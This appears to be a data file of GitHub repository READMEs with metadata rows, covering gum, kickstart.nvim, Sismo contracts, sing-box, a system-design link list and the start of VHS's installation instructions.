message: ```bash git commit -m "$(gum input --width 50 --placeholder "Summary of changes")" \ -m "$(gum write --width 80 --placeholder "Details of changes")" ``` * Open files in your `$EDITOR` ```bash $EDITOR $(gum filter) ``` * Connect to a `tmux` session ```bash SESSION=$(tmux list-sessions -F \#S | gum filter --placeholder "Pick session...") tmux switch-client -t $SESSION || tmux attach -t $SESSION ``` * Pick a commit hash from `git` history ```bash git log --oneline | gum filter | cut -d' ' -f1 # | copy ``` * Simple [`skate`](https://github.com/charmbracelet/skate) password selector. ``` skate list -k | gum filter | xargs skate get ``` * Uninstall packages ```bash brew list | gum choose --no-limit | xargs brew uninstall ``` * Clean up `git` branches ```bash git branch | cut -c 3- | gum choose --no-limit | xargs git branch -D ``` * Checkout GitHub pull requests with [`gh`](https://cli.github.com/) ```bash gh pr list | cut -f1,2 | gum choose | cut -f1 | xargs gh pr checkout ``` * Copy command from shell history ```bash gum filter < $HISTFILE --height 20 ``` * `sudo` replacement ```bash alias please="gum input --password | sudo -nS" ``` ## Feedback Weโ€™d love to hear your thoughts on this project. Feel free to drop us a note! * [Twitter](https://twitter.com/charmcli) * [The Fediverse](https://mastodon.social/@charmcli) * [Discord](https://charm.sh/chat) ## License [MIT](https://github.com/charmbracelet/gum/raw/main/LICENSE) *** Part of [Charm](https://charm.sh). <a href="https://charm.sh/"><img alt="The Charm logo" src="https://stuff.charm.sh/charm-badge.jpg" width="400" /></a> Charm็ƒญ็ˆฑๅผ€ๆบ โ€ข Charm loves open source
A tool for glamorous shell scripts ๐ŸŽ€
bash,shell
15
51
252
447
139
5
5
nvim-lua/kickstart.nvim
# kickstart.nvim ## Introduction A starting point for Neovim that is: * Small * Single-file * Completely Documented **NOT** a Neovim distribution, but instead a starting point for your configuration. ## Installation ### Install Neovim Kickstart.nvim targets *only* the latest ['stable'](https://github.com/neovim/neovim/releases/tag/stable) and latest ['nightly'](https://github.com/neovim/neovim/releases/tag/nightly) of Neovim. If you are experiencing issues, please make sure you have the latest versions. ### Install External Dependencies External Requirements: - Basic utils: `git`, `make`, `unzip`, C Compiler (`gcc`) - [ripgrep](https://github.com/BurntSushi/ripgrep#installation) - Clipboard tool (xclip/xsel/win32yank or other depending on platform) - A [Nerd Font](https://www.nerdfonts.com/): optional, provides various icons - if you have it set `vim.g.have_nerd_font` in `init.lua` to true - Language Setup: - If want to write Typescript, you need `npm` - If want to write Golang, you will need `go` - etc. > **NOTE** > See [Install Recipes](#Install-Recipes) for additional Windows and Linux specific notes > and quick install snippets ### Install Kickstart > **NOTE** > [Backup](#FAQ) your previous configuration (if any exists) Neovim's configurations are located under the following paths, depending on your OS: | OS | PATH | | :- | :--- | | Linux, MacOS | `$XDG_CONFIG_HOME/nvim`, `~/.config/nvim` | | Windows (cmd)| `%userprofile%\AppData\Local\nvim\` | | Windows (powershell)| `$env:USERPROFILE\AppData\Local\nvim\` | #### Recommended Step [Fork](https://docs.github.com/en/get-started/quickstart/fork-a-repo) this repo so that you have your own copy that you can modify, then install by cloning the fork to your machine using one of the commands below, depending on your OS. > **NOTE** > Your fork's url will be something like this: > `https://github.com/<your_github_username>/kickstart.nvim.git` #### Clone kickstart.nvim > **NOTE** > If following the recommended step above (i.e., forking the repo), replace > `nvim-lua` with `<your_github_username>` in the commands below <details><summary> Linux and Mac </summary> ```sh git clone https://github.com/nvim-lua/kickstart.nvim.git "${XDG_CONFIG_HOME:-$HOME/.config}"/nvim ``` </details> <details><summary> Windows </summary> If you're using `cmd.exe`: ``` git clone https://github.com/nvim-lua/kickstart.nvim.git %userprofile%\AppData\Local\nvim\ ``` If you're using `powershell.exe` ``` git clone https://github.com/nvim-lua/kickstart.nvim.git $env:USERPROFILE\AppData\Local\nvim\ ``` </details> ### Post Installation Start Neovim ```sh nvim ``` That's it! Lazy will install all the plugins you have. Use `:Lazy` to view current plugin status. Hit `q` to close the window. Read through the `init.lua` file in your configuration folder for more information about extending and exploring Neovim. That also includes examples of adding popularly requested plugins. ### Getting Started [The Only Video You Need to Get Started with Neovim](https://youtu.be/m8C0Cq9Uv9o) ### FAQ * What should I do if I already have a pre-existing neovim configuration? * You should back it up and then delete all associated files. * This includes your existing init.lua and the neovim files in `~/.local` which can be deleted with `rm -rf ~/.local/share/nvim/` * Can I keep my existing configuration in parallel to kickstart? * Yes! You can use [NVIM_APPNAME](https://neovim.io/doc/user/starting.html#%24NVIM_APPNAME)`=nvim-NAME` to maintain multiple configurations. For example, you can install the kickstart configuration in `~/.config/nvim-kickstart` and create an alias: ``` alias nvim-kickstart='NVIM_APPNAME="nvim-kickstart" nvim' ``` When you run Neovim using `nvim-kickstart` alias it will use the alternative config directory and the matching local directory `~/.local/share/nvim-kickstart`. You can apply this approach to any Neovim distribution that you would like to try out. * What if I want to "uninstall" this configuration: * See [lazy.nvim uninstall](https://github.com/folke/lazy.nvim#-uninstalling) information * Why is the kickstart `init.lua` a single file? Wouldn't it make sense to split it into multiple files? * The main purpose of kickstart is to serve as a teaching tool and a reference configuration that someone can easily use to `git clone` as a basis for their own. As you progress in learning Neovim and Lua, you might consider splitting `init.lua` into smaller parts. A fork of kickstart that does this while maintaining the same functionality is available here: * [kickstart-modular.nvim](https://github.com/dam9000/kickstart-modular.nvim) * Discussions on this topic can be found here: * [Restructure the configuration](https://github.com/nvim-lua/kickstart.nvim/issues/218) * [Reorganize init.lua into a multi-file setup](https://github.com/nvim-lua/kickstart.nvim/pull/473) ### Install Recipes Below you can find OS specific install instructions for Neovim and dependencies. After installing all the dependencies continue with the [Install Kickstart](#Install-Kickstart) step. #### Windows Installation <details><summary>Windows with Microsoft C++ Build Tools and CMake</summary> Installation may require installing build tools and updating the run command for `telescope-fzf-native` See `telescope-fzf-native` documentation for [more details](https://github.com/nvim-telescope/telescope-fzf-native.nvim#installation) This requires: - Install CMake and the Microsoft C++ Build Tools on Windows ```lua {'nvim-telescope/telescope-fzf-native.nvim', build = 'cmake -S. -Bbuild -DCMAKE_BUILD_TYPE=Release && cmake --build build --config Release && cmake --install build --prefix build' } ``` </details> <details><summary>Windows with gcc/make using chocolatey</summary> Alternatively, one can install gcc and make which don't require changing the config, the easiest way is to use choco: 1. install [chocolatey](https://chocolatey.org/install) either follow the instructions on the page or use winget, run in cmd as **admin**: ``` winget install --accept-source-agreements chocolatey.chocolatey ``` 2. install all requirements using choco, exit previous cmd and open a new one so that choco path is set, and run in cmd as **admin**: ``` choco install -y neovim git ripgrep wget fd unzip gzip mingw make ``` </details> <details><summary>WSL (Windows Subsystem for Linux)</summary> ``` wsl --install wsl sudo add-apt-repository ppa:neovim-ppa/unstable -y sudo apt update sudo apt install make gcc ripgrep unzip git xclip neovim ``` </details> #### Linux Install <details><summary>Ubuntu Install Steps</summary> ``` sudo add-apt-repository ppa:neovim-ppa/unstable -y sudo apt update sudo apt install make gcc ripgrep unzip git xclip neovim ``` </details> <details><summary>Debian Install Steps</summary> ``` sudo apt update sudo apt install make gcc ripgrep unzip git xclip curl # Now we install nvim curl -LO https://github.com/neovim/neovim/releases/latest/download/nvim-linux64.tar.gz sudo rm -rf /opt/nvim-linux64 sudo mkdir -p /opt/nvim-linux64 sudo chmod a+rX /opt/nvim-linux64 sudo tar -C /opt -xzf nvim-linux64.tar.gz # make it available in /usr/local/bin, distro installs to /usr/bin sudo ln -sf /opt/nvim-linux64/bin/nvim /usr/local/bin/ ``` </details> <details><summary>Fedora Install Steps</summary> ``` sudo dnf install -y gcc make git ripgrep fd-find unzip neovim ``` </details> <details><summary>Arch Install Steps</summary> ``` sudo pacman -S --noconfirm --needed gcc make git ripgrep fd unzip neovim ``` </details>
A launch point for your personal nvim configuration
null
0
113
563
277
13
13
1
sismo-core/sismo-badges
<br /> <div align="center"> <img src="docs/top.png" alt="Logo" width="100" height="100" style="borderRadius: 20px"> <h3 align="center"> Sismo Protocol Contracts </h3> <p align="center"> Made by <a href="https://www.sismo.io/" target="_blank">Sismo</a> </p> <p align="center"> <a href="https://discord.gg/sismo" target="_blank"> <img src="https://img.shields.io/badge/Discord-7289DA?style=for-the-badge&logo=discord&logoColor=white"/> </a> <a href="https://twitter.com/sismo_eth" target="_blank"> <img src="https://img.shields.io/badge/Twitter-1DA1F2?style=for-the-badge&logo=twitter&logoColor=white"/> </a> </p> <a href="https://www.sismo.io/" target="_blank"> </a> </div> <br/> This repository contains the smart contracts of the Sismo Protocol. There are three core contracts: - `core/AttestationsRegistry.sol`: The registry stores all attestations. It is owned by the governance that authorizes/unauthorize issuers to record in it - `core/Attester.sol` The standard abstract contract must be inherited by attesters. Attesters are issuers of attestations. They verify user requests and build attestations that will be recorded in the registry - `core/Badges.sol` Reads the registry. Stateless Non Transferable Token view of attestations (ERC1155) It also contains implementations of attester in `attesters/`: - `HydraS1SimpleAttester.sol`: ZK Attester using the [Hydra S1 Proving Scheme](https://hydra-s1.docs.sismo.io) and the notion of nullifiers. Users must provide a ZK Proof along with their request to generate attestations - `HydraS1AccountboundAttester.sol`: Accountbound version of the Simple Hydra S1 Simple Attester. (Users can update at will where the attestation is stored) <br/><br/> ## Sismo protocol A complete overview of the protocol is available in our [documentation](https://protocol.docs.sismo.io) ## Deployed contracts Deployed contracts can be found [here](https://docs.sismo.io/sismo-docs/deployed-contract-addresses) ## Usage ### Installation ``` yarn ``` ### Compile contracts Compile contracts using hardhat ``` yarn compile ``` ### Test Launch all tests ``` yarn test ``` ### Print storage layout ``` yarn storage-layout ``` ### Deploy on local chain Terminal tab 1 ``` yarn chain ``` Terminal tab 2 ``` yarn deploy:local ``` ## Create a new Attester To develop a new attester, you must inherit the `core/Attester.sol` abstract contract and implement the following functions: - `_verifyRequest(request, proofData)`: You must implement the user request verification against the proof provided by the user - `buildAttestations(request, proofData)`: You must build the attestations that will be recorded from a verified user request Other optional hook functions that can be implemented: - `_beforeRecordAttestations(request, proofData)` - `_afterRecordAttestations(request, proofData)` The `/attesters/hydra-s1/HydraS1SimpleAttester.sol` is a good example of an attester implementing those functions. A [guide](https://attesters.docs.sismo.io) is offered in our documentation. Feel free open a PR with your new attester in `/attester`! ## License Distributed under the MIT License. ## Contribute Please, feel free to open issues, PRs or simply provide feedback! ## Contact Prefer [Discord](https://discord.gg/sismo) or [Twitter](https://twitter.com/sismo_eth) <br/> <img src="https://static.sismo.io/readme/bottom-main.png" alt="bottom" width="100%" >
Contracts of the Sismo Badge Minting Protocol
did,ethereum,zkp,attestations,smart-contracts
29
7
69
307
1
32
2
SagerNet/sing-box
# sing-box The universal proxy platform. [![Packaging status](https://repology.org/badge/vertical-allrepos/sing-box.svg)](https://repology.org/project/sing-box/versions) ## Documentation https://sing-box.sagernet.org ## Support https://community.sagernet.org/c/sing-box/ ## License ``` Copyright (C) 2022 by nekohasekai <contact-sagernet@sekai.icu> This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. In addition, no derivative work may use the name or imply association with this application without prior consent. ```
The universal proxy platform
null
268
60
306
1,394
46
26
5
InterviewReady/system-design-resources
# System Design Resources These are the best resources for System Design on the Internet. # Table of Contents - [Video Processing](#video-processing) - [Cluster and Workflow Management](#cluster-and-workflow-management) - [Intra-Service Messaging](#intra-service-messaging) - [Message Queue Antipattern](#message-queue-antipattern) - [Service Mesh](#service-mesh) - [Practical System Design](#practical-system-design) - [Distributed File System](#distributed-file-system) - [Time Series Databases](#time-series-databases) - [Rate Limiting](#rate-limiting) - [In Memory Database - Redis](#in-memory-database---redis) - [Network Protocols](#network-protocols) - [Chess Engine Design](#chess-engine-design) - [Subscription Management System](#subscription-management-system) - [Google Docs](#google-docs) - [API Design](#api-design) - [NoSQL Database Internals](#nosql-database-internals) - [NoSQL Database Algorithms](#nosql-database-algorithms) - [Database Replication](#database-replication) - [Containers and Docker](#containers-and-docker) - [Capacity Estimation](#capacity-estimation) - [Publisher Subscriber](#publisher-subscriber) - [Event Driven Architectures](#event-driven-architectures) - [Software Architectures](#software-architectures) - [Microservices](#microservices) - [Distributed Transactions consistency Patterns](#distributed-transactions-consistency-patterns) - [Load Balancing](#load-balancing) - [Alerts and Anomaly Detection](#alerts-and-anomaly-detection) - [Distributed Logging](#distributed-logging) - [Metrics and Text Search Engine](#metrics-and-text-search-engine) - [Single Point of Failure](#single-point-of-failure) - [Location Based Services](#location-based-services) - [Batch Processing](#batch-processing) - [Real Time Stream Processing](#real-time-stream-processing) - [Caching](#caching) - [Distributed Consensus](#distributed-consensus) - [Authorization](#authorization) - [Content Delivery Network](#content-delivery-network) - [Testing Distributed Systems](#testing-distributed-systems) - [System Design Resources](#system-design-resources) ## ## Video Processing - [Transcoding Videos at Scale](https://www.egnyte.com/blog/2018/12/transcoding-how-we-serve-videos-at-scale/) - [Facebook Video Broadcasting](https://engineering.fb.com/ios/under-the-hood-broadcasting-live-video-to-millions/) - [Netflix Video Encoding at Scale](https://netflixtechblog.com/high-quality-video-encoding-at-scale-d159db052746) - [Netflix Shot based encoding](https://netflixtechblog.com/optimized-shot-based-encodes-now-streaming-4b9464204830) ## ## Cluster and Workflow Management - [Facebook Cluster Management](https://engineering.fb.com/data-center-engineering/twine/) - [Google Autopilot - Autoscaling](https://dl.acm.org/doi/pdf/10.1145/3342195.3387524) - [Netflix Workflow Orchestration](https://netflix.github.io/conductor/) - [Opensource Workflow Management](https://github.com/spotify/luigi) - [Meta Hardware Management](https://engineering.fb.com/2020/12/09/data-center-engineering/how-facebook-keeps-its-large-scale-infrastructure-hardware-up-and-running/) - [Meta Capacity Assignment](https://engineering.fb.com/2022/09/06/data-center-engineering/viewing-the-world-as-a-computer-global-capacity-management/) - [Amazon EC2](https://www.allthingsdistributed.com/2015/07/under-the-hood-of-the-amazon-ec2-container-service.html) ## ## Intra-Service Messaging - [What is a message queue](https://www.cloudamqp.com/blog/what-is-message-queuing.html) - [AirBnb Idempotency](https://medium.com/airbnb-engineering/avoiding-double-payments-in-a-distributed-payments-system-2981f6b070bb) - [Nginx Service Mesh](https://www.nginx.com/learn/service-mesh/) - [Meta Async Task Computing](https://engineering.fb.com/2023/01/31/production-engineering/meta-asynchronous-computing/) ## Message Queue Antipattern - [DB as queue Antipattern](https://en.wikipedia.org/wiki/Database-as-IPC) - [Using a database as a message queue](https://softwareengineering.stackexchange.com/questions/231410/why-database-as-queue-so-bad) - [Anti-pattern of DB as a queue](http://mikehadlow.blogspot.com/2012/04/database-as-queue-anti-pattern.html) - [Drawbacks of DB as a queue](https://www.cloudamqp.com/blog/why-is-a-database-not-the-right-tool-for-a-queue-based-system.html) ## ## Service Mesh - [Kubernetes Service Mesh](https://akomljen.com/kubernetes-service-mesh/) - [Kubernetes Sidecar](https://www.weave.works/blog/introduction-to-service-meshes-on-kubernetes-and-progressive-delivery) - [Service Mesh](https://www.weave.works/blog/introduction-to-service-meshes-on-kubernetes-and-progressive-delivery) - [NginX Service Mesh](https://www.nginx.com/learn/service-mesh/) - [Data Plane and Control Plane](https://blog.envoyproxy.io/service-mesh-data-plane-vs-control-plane-2774e720f7fc) ## ## Practical System Design - [Facebook Messenger Optimisations](https://spectrum.ieee.org/how-facebooks-software-engineers-prepare-messenger-for-new-years-eve) - [YouTube Architecture](http://highscalability.com/youtube-architecture) - [YouTube scalability 2012](https://www.youtube.com/watch?v=w5WVu624fY8) - [Distributed Design Patterns](http://horicky.blogspot.com/2010/10/scalable-system-design-patterns.html) - [Monolith to Microservice](https://martinfowler.com/articles/break-monolith-into-microservices.html) - [Zerodha Tech Stack](https://zerodha.tech/blog/hello-world/) ## ## Distributed File System - [Open Source Distributed File System](https://docs.ceph.com/en/latest/architecture/) - [Amazon S3 Performance hacks](https://aws.amazon.com/blogs/aws/amazon-s3-performance-tips-tricks-seattle-hiring-event/) - [Amazon S3 object expiration](https://aws.amazon.com/blogs/aws/amazon-s3-object-expiration/) ## ## Time Series Databases - [Pinterest Time Series Database](https://medium.com/pinterest-engineering/goku-building-a-scalable-and-high-performant-time-series-database-system-a8ff5758a181) - [Uber Time Series DB](https://eng.uber.com/aresdb/) - [TimeSeries Relational DB](https://blog.timescale.com/blog/time-series-data-why-and-how-to-use-a-relational-database-instead-of-nosql-d0cd6975e87c) - [Facebook Gorilla Time Series DB](http://www.vldb.org/pvldb/vol8/p1816-teller.pdf) ## ## Rate Limiting - [Circuit Breaker Algorithm](https://martinfowler.com/bliki/CircuitBreaker.html) - [Uber Rate Limiter](https://github.com/uber-go/ratelimit/blob/master/ratelimit.go) ## ## In Memory Database - Redis - [Redis Official Documentation](https://redis.com/) - [Learn Redis through Redis University](https://university.redis.com/) - [Redis Open Source Repo](https://github.com/redis/redis) - [Redis Architecture](https://medium.com/opstree-technology/redis-cluster-architecture-replication-sharding-and-failover-86871e783ac0) ## ## Network Protocols - [What is HTTP](https://engineering.cred.club/head-of-line-hol-blocking-in-http-1-and-http-2-50b24e9e3372) - [QUIC Protocol](https://www.akamai.com/blog/performance/http3-and-quic-past-present-and-future) - [TCP Protocol algorithms](https://ee.lbl.gov/papers/congavoid.pdf) (First 10 pages are important) - [WebRTC](https://webrtc.github.io/webrtc-org/blog/2012/07/23/a-great-introduction-to-webrtc.html) - [WebSockets](https://datatracker.ietf.org/doc/html/rfc6455#section-1.2) - [Dynamic Source Routing using QUIC](https://fb.watch/fSEbI4KHlA/) ## ## Chess Engine Design - [Chess Engine Building](https://www.youtube.com/watch?v=U4ogK0MIzqk) ## ## Subscription Management System - [Subscription Manager](https://netflixtechblog.com/building-a-rule-based-platform-to-manage-netflix-membership-skus-at-scale-e3c0f82aa7bc) ## ## Google Docs - [Operational Transform](http://www.codecommit.com/blog/java/understanding-and-applying-operational-transformation) - [Google Docs](https://www.youtube.com/watch?v=uOFzWZrsPV0&list=PLX) - [Lumiere](https://www.arxiv.org/abs/2401.12945) ## ## API Design - [API Design at Airbnb](https://medium.com/airbnb-engineering/building-services-at-airbnb-part-1-c4c1d8fa811b) - [Swagger APIs](https://swagger.io/docs/specification/about/) ## ## NoSQL Database Internals - [Cassandra Architecture](https://docs.datastax.com/en/archived/cassandra/3.0/cassandra/architecture/archIntro.html) - [Google BigTable Architecture](https://static.googleusercontent.com/media/research.google.com/en//archive/bigtable-osdi06.pdf) - [Amazon Dynamo DB Internals](https://www.allthingsdistributed.com/2007/10/amazons_dynamo.html) - [Design Patterns in Amazon Dynamo DB](https://www.youtube.com/watch?v=HaEPXoXVf2k) - [Internals of Amazon Dynamo DB](https://www.youtube.com/watch?v=yvBR71D0nAQ) ## ## NoSQL Database Algorithms - [Hyperloglog Algorithm](https://odino.org/my-favorite-data-structure-hyperloglog/) - [Log Structured Merge Tree](https://www.cs.umb.edu/~poneil/lsmtree.pdf) - [Sorted String Tables and Compaction Strategies](https://github.com/scylladb/scylla/wiki/SSTable-compaction-and-compaction-strategies) - [Leveled Compaction Cassandra](https://www.datastax.com/blog/leveled-compaction-apache-cassandra) - [Scylla DB Compaction](https://github.com/scylladb/scylla/wiki/SSTable-compaction-and-compaction-strategies) - [Indexing in Cassandra](https://www.bmc.com/blogs/cassandra-clustering-columns-partition-composite-key/) ## ## Database Replication - [Database replication](https://dev.mysql.com/doc/refman/8.0/en/replication.html) - [Netflix Data replication - Change Data Capture](https://netflixtechblog.com/dblog-a-generic-change-data-capture-framework-69351fb9099b) - [LinkedIn Logging Usecases](https://engineering.linkedin.com/distributed-systems/log-what-every-software-engineer-should-know-about-real-time-datas-unifying) - [Uber Trillions of indexes in LedgerStore](https://www.uber.com/en-IN/blog/how-ledgerstore-supports-trillions-of-indexes) ## ## Containers and Docker - [Facebook Twine Containerization](https://engineering.fb.com/developer-tools/zookeeper-twine/) - [CloudFlare Containerization](https://blog.cloudflare.com/cloud-computing-without-containers/) - [Docker Architecture](https://docs.docker.com/get-started/overview/#docker-architecture) ## ## Capacity Estimation - [Google Capacity Estimation](https://www.youtube.com/watch?v=modXC5IWTJI) - [Scalability at YouTube 2012](https://www.youtube.com/watch?v=G-lGCC4KKok) - [Back of envelope Calculations at AWS](https://www.youtube.com/watch?v=-3qetLv2Yp0) - [Capacity Estimation](http://static.googleusercontent.com/media/research.google.com/en//people/jeff/stanford-295-talk.pdf) ## ## Publisher Subscriber - [Oracle Publisher Subscriber](https://docs.oracle.com/cd/B10501_01/appdev.920/a96590/adg15pub.htm) - [Amazon Pub Sub Messaging](https://aws.amazon.com/pub-sub-messaging/) - [Asynchronous processing](http://blog.codepath.com/2013/01/06/asynchronous-processing-in-web-applications-part-2-developers-need-to-understand-message-queues/) - [Async Request Response](https://www.enterpriseintegrationpatterns.com/patterns/conversation/RequestResponse.html) ## ## Event Driven Architectures - [Martin Fowler- Event Driven Architecture](https://www.youtube.com/watch?v=STKCRSUsyP0) - [Event Driven Architecture](https://martinfowler.com/articles/201701-event-driven.html) ## ## Software Architectures - [Hexagonal Architecture](https://netflixtechblog.com/ready-for-changes-with-hexagonal-architecture-b315ec967749) - [Hexagonal architecture (Alistair Cockburn)](https://alistair.cockburn.us/hexagonal-architecture/) - [The Clean Code by Robert C. Martin (Uncle Bob)](https://blog.cleancoder.com/uncle-bob/2012/08/13/the-clean-architecture.html) - [CQRS](https://martinfowler.com/bliki/CQRS.html) - [DomainDrivenDesign](https://martinfowler.com/bliki/DomainDrivenDesign.html) ## ## Microservices - [Monolith Architecture](https://buttercms.com/books/microservices-for-startups/should-you-always-start-with-a-monolith/) - [Monoliths vs Microservices](https://articles.microservices.com/monolithic-vs-microservices-architecture-5c4848858f59) - [Microservices](http://highscalability.com/blog/2018/4/5/do-you-have-too-many-microservices-five-design-attributes-th.html) - [Uber Nanoservices antipattern](https://www.youtube.com/watch?v=kb-m2fasdDY) - [Uber Domain oriented microservice](https://eng.uber.com/microservice-architecture/) ## ## Distributed Transactions consistency Patterns - [Transactional outbox](https://microservices.io/patterns/data/transactional-outbox.html) - [SAGAS Long lived transactions (LLTs)](https://www.cs.cornell.edu/andru/cs711/2002fa/reading/sagas.pdf) ## ## Load Balancing - [Load Balancer with Sticky Sessions](https://stackoverflow.com/questions/10494431/sticky-and-non-sticky-sessions) - [NetScaler what is load balancing](https://www.netscaler.com/articles/what-is-load-balancing) - [Nginx Load Balancing](https://www.nginx.com/resources/glossary/load-balancing/) - [Consistent hashing](https://michaelnielsen.org/blog/consistent-hashing/) ## ## Alerts and Anomaly Detection - [Outlier Detection](https://towardsdatascience.com/outlier-detection-with-isolation-forest-3d190448d45e) - [Anomaly Detection](https://towardsdatascience.com/machine-learning-for-anomaly-detection-and-condition-monitoring-d4614e7de770) - [Uber Real Time Monitoring and Root Cause Analysis Argos](https://eng.uber.com/argos-real-time-alerts/) - [Microsoft Anomaly Detection](https://www.youtube.com/watch?v=12Xq9OLdQwQ&t=0s) - [Facebook Data Engineering](https://engineering.fb.com/2016/05/09/core-data/introducing-fblearner-flow-facebook-s-ai-backbone/) - [LinkedIn Real Time Alerting](https://engineering.linkedin.com/blog/2019/06/smart-alerts-in-thirdeye--linkedins-real-time-monitoring-platfor) - [LinkedIn Isolation Forests](https://engineering.linkedin.com/blog/2019/isolation-forest) ## ## Distributed Logging - [Uber Distributed Request Tracing](https://eng.uber.com/distributed-tracing/) - [Pintrest Logging](https://medium.com/@Pinterest_Engineering/open-sourcing-singer-pinterests-performant-and-reliable-logging-agent-610fecf35566) - [Google Monitoring Infrastructure](https://www.facebook.com/atscaleevents/videos/959344524420015/) ## ## Metrics and Text Search Engine - [Facebook real-time text search engine](https://www.facebook.com/watch/?v=432864835468) - [Elastic Search Time Based Querying](https://www.elastic.co/guide/en/elasticsearch/guide/current/time-based.html) - [Elastic Search Aggregation](https://www.elastic.co/guide/en/elasticsearch/guide/current/aggregations.html) ## ## Single Point of Failure - [Avoiding Single Points of Failure](https://medium.com/the-cloud-architect/patterns-for-resilient-architecture-part-3-16e8601c488e) - [Netflix Multi-Region Availability](https://netflixtechblog.com/active-active-for-multi-regional-resiliency-c47719f6685b) - [Oracle Single Points of failure](https://docs.oracle.com/cd/E19693-01/819-0992/fjdch/index.html) - [DNS single point of failure 2004](http://www.tenereillo.com/GSLBPageOfShame.htm) - [DNS traffic management by Shopify](https://shopify.engineering/introduction-dns-traffic-management) - [Sharding](https://medium.com/@jeeyoungk/how-sharding-works-b4dec46b3f6) ## ## Location Based Services - [Google S2 library](https://blog.christianperone.com/2015/08/googles-s2-geometry-on-the-sphere-cells-and-hilbert-curve/) ## ## Batch Processing - [Map Reduce Architecture](https://static.googleusercontent.com/media/research.google.com/en//archive/mapreduce-osdi04.pdf) ## ## Real Time Stream Processing - [LinkedIn Brooklin- Real-time data streaming](https://engineering.linkedin.com/blog/2019/brooklin-open-source) - [Netflix Real Time Stream Processing](https://netflixtechblog.com/keystone-real-time-stream-processing-platform-a3ee651812a) - [KSQLDB for Kafka](https://docs.ksqldb.io/en/latest/operate-and-deploy/how-it-works/) - [Netflix Psyberg](https://netflixtechblog.com/1-streamlining-membership-data-engineering-at-netflix-with-psyberg-f68830617dd1) ## ## Caching - [Google Guava Cache](https://github.com/google/guava/wiki/CachesExplained) - [Caching (See the README)](https://github.com/ben-manes/caffeine/) - [Caching](http://highscalability.com/blog/2016/1/25/design-of-a-modern-cache.html) - [Microsoft Caching Guide](https://docs.microsoft.com/en-us/previous-versions/msp-n-p/dn589802(v%3dpandp.10)) - [Caching patterns](https://hazelcast.com/blog/a-hitchhikers-guide-to-caching-patterns/) ## ## Distributed consensus - [Paxos](http://ifeanyi.co/posts/understanding-consensus/) - [Raft](https://raft.github.io/) ## ## Authorization - [Designing an Authorization Model for an Enterprise](https://cerbos.dev/blog/designing-an-authorization-model-for-an-enterprise) - [The Architectural Patterns of Cloud-native Authorization Systems](https://www.aserto.com/blog/5-laws-cloud-native-authorization) ## ## Content Delivery Network - [AWS CloudFront CDN with S3](https://aws.amazon.com/blogs/networking-and-content-delivery/amazon-s3-amazon-cloudfront-a-match-made-in-the-cloud/) ## ## Testing Distributed Systems - [Deterministic Testing](https://www.youtube.com/watch?v=4fFDFbi3toc) - [TLA+ by Leslie Lamport](https://lamport.azurewebsites.net/tla/tla.html) - [Jepsen](https://jenpsen.io) ## ## System Design Resources - [Designing Data-Intensive Applications Book](https://amzn.to/3SyNAOy) - [WhitePapers](https://interviewready.io/blog/white-papers-worth-reading-for-software-engineers) - [InterviewReady Videos](https://interviewready.io?source=github) - [System Design Online Judge](https://interviewready.io/question-list/system-design-judge)
These are the best resources for System Design on the Internet
cache,fault-tolerance,scalability,system-design
0
12
20
74
0
1
1
charmbracelet/vhs
# VHS <p> <img src="https://user-images.githubusercontent.com/42545625/198402537-12ca2f6c-0779-4eb8-a67c-8db9cb3df13c.png#gh-dark-mode-only" width="500" /> <img src="https://user-images.githubusercontent.com/42545625/198402542-a305f669-a05a-4d91-b18b-ca76e72b655a.png#gh-light-mode-only" width="500" /> <br> <a href="https://github.com/charmbracelet/vhs/releases"><img src="https://img.shields.io/github/release/charmbracelet/vhs.svg" alt="Latest Release"></a> <a href="https://pkg.go.dev/github.com/charmbracelet/vhs?tab=doc"><img src="https://godoc.org/github.com/golang/gddo?status.svg" alt="Go Docs"></a> <a href="https://github.com/charmbracelet/vhs/actions"><img src="https://github.com/charmbracelet/vhs/workflows/build/badge.svg" alt="Build Status"></a> </p> Write terminal GIFs as code for integration testing and demoing your CLI tools. <img alt="Welcome to VHS" src="https://stuff.charm.sh/vhs/examples/neofetch_3.gif" width="600" /> The above example was generated with VHS ([view source](./examples/neofetch/neofetch.tape)). ## Tutorial To get started, [install VHS](#installation) and create a new `.tape` file. ```sh vhs new demo.tape ``` Open the `.tape` file with your favorite `$EDITOR`. ```sh vim demo.tape ``` Tape files consist of a series of [commands](#vhs-command-reference). The commands are instructions for VHS to perform on its virtual terminal. For a list of all possible commands see [the command reference](#vhs-command-reference). ```elixir # Where should we write the GIF? Output demo.gif # Set up a 1200x600 terminal with 46px font. Set FontSize 46 Set Width 1200 Set Height 600 # Type a command in the terminal. Type "echo 'Welcome to VHS!'" # Pause for dramatic effect... Sleep 500ms # Run the command by pressing enter. Enter # Admire the output for a bit. Sleep 5s ``` Once you've finished, save the file and feed it into VHS. ```sh vhs demo.tape ``` All done! You should see a new file called `demo.gif` (or whatever you named the `Output`) in the directory. <picture> <source media="(prefers-color-scheme: dark)" srcset="https://stuff.charm.sh/vhs/examples/demo.gif"> <source media="(prefers-color-scheme: light)" srcset="https://stuff.charm.sh/vhs/examples/demo.gif"> <img width="600" alt="A GIF produced by the VHS code above" src="https://stuff.charm.sh/vhs/examples/demo.gif"> </picture> For more examples see the [`examples/`](https://github.com/charmbracelet/vhs/tree/main/examples) directory. ## Installation > [!NOTE] > VHS requires [`ttyd`](https://github.com/tsl0922/ttyd) and [`ffmpeg`](https://ffmpeg.org) to be installed and available on your `PATH`. Use a package manager: ```sh # macOS or Linux brew install vhs # Arch Linux (btw) pacman -S vhs # Nix nix-env -iA nixpkgs.vhs # Windows using scoop scoop install vhs ``` Or, use Docker to run VHS directly, dependencies included: ```sh docker run --rm -v $PWD:/vhs ghcr.io/charmbracelet/vhs <cassette>.tape ``` Or, download it: * [Packages][releases] are available in Debian and RPM formats * [Binaries][releases] are available for Linux, macOS, and Windows Or, just install it with `go`: ```sh go install github.com/charmbracelet/vhs@latest ``` <details> <summary>Windows, Debian, Ubuntu, Fedora, RHEL, Void Instructions</summary> * Debian / Ubuntu ```sh # Debian/Ubuntu sudo mkdir -p /etc/apt/keyrings curl -fsSL https://repo.charm.sh/apt/gpg.key | sudo gpg --dearmor -o /etc/apt/keyrings/charm.gpg 